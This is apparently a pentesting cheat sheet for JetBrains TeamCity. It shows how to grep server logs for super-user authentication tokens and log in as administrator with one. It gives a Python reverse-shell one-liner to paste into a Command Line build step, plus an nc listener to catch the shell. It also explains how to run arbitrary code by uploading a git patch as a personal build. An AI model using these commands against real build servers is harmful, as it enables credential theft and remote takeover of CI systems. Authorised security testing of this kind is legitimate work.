TeamCity Pentesting

TeamCity is a build management and continuous integration server from JetBrains.

Common Directories

/admin
/admin/admin.html

Interesting Files in Systems

TeamCity/conf/teamcity-startup.propertie
.BuildServer/system

Find Super User Authentication Tokens

If we find a super user authentication token, we can login as super user using the token.

grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs

After retrieving, we can login as administrator by entering the token in the password field and empty the username.

Arbitrary Command Execution by Custom Script

1. Login as admin user.

2. Create a new project in admin dashboard.

3. Click "Manual" tab and fill required fields.

4. A new project is created.

5. In the project home, create a Build Configurations.

6. In the build configuration page, click "Build Steps" on the left menus.

7. Add build step.

8. Select "Command Line" in Runner type.

9. Put a Python reverse shell script in the "Custom script".

   export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

10. Start listener in local machine.

    nc -lvnp 4444

11. Click "Run" button in the build page.

12. We should get a shell in terminal.

Arbitrary Command Execution by Diff Build

If we can modify a building script, we can execute arbitrary script by uploading a git patch file. First, modify the script to our desired code.

cd /path/to/repository
vim example.ps
git diff > patch

Then go to the build configuration page, and open the "Run Custom Build" at the right of the Run button. In General section, check "run as personal build" and upload the patch file which was generated above. Now click "Run Build". Our arbitrary code will be executed when building.

References

• JetBrains